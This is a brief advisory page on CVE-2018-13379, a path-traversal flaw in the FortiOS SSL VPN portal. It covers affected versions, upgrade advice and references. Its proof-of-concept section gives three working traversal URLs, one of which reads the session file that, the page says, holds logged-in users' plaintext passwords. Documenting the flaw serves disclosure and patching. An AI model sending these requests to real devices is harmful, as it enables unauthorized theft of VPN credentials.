• CVE
• 2018
• 13379

General Disclosure

This is a path-traversal vulnerability in the FortiOS SSL VPN web portal that could potentially allow an unauthenticated attacker to download files through specially crafted HTTP resource requests. Fortinet advises customers to upgrade to FortiOS 5.4.13, 5.6.11, 6.0.6, 6.2.2.

POC

The next example URL's are responsible:

https://<IP>:<PORT>/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
https://<IP>:<PORT>/remote/fgt_lang?lang=/../../../..//////////////////////////////bin/sh
https://<IP>:<PORT>/remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd

Just make a request to these URL's and you will get the information needed. Keep in mind that the length of the URL has to be this size. You can also find a proof of concept on GitHub

There is a strange fact that if you start a SSLVPN, you have to log in into the webportal on the internet facing part of the Fortigate. After a successful login, the device writes your IP address, username and password in plaintext to the temporary location /dev/cmdb/sslvpn_websession. If you read this file, the current logged in users and passwords will be visible.

Affected Systems

Here is a list of the operating systems we have tested which are vulnerable to this attack:

• FortiOS 6.0 - 6.0.0 to 6.0.4
• FortiOS 5.6 - 5.6.3 to 5.6.7
• FortiOS 5.4 - 5.4.6 to 5.4.12

Possible Mitigations

Please upgrade!

References

• Fortigate

  • https://kb.fortinet.com/kb/documentLink.do?externalID=FD46513

• Github

  • https://github.com/milo2012/CVE-2018-13379

• Explaination exploit

  • https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html

  • https://medium.com/@valeriyshevchenko/critical-vulnerabilities-in-pulse-secure-and-fortinet-ssl-vpns-in-the-wild-internet-3991ea9e6481

CategoryNetwork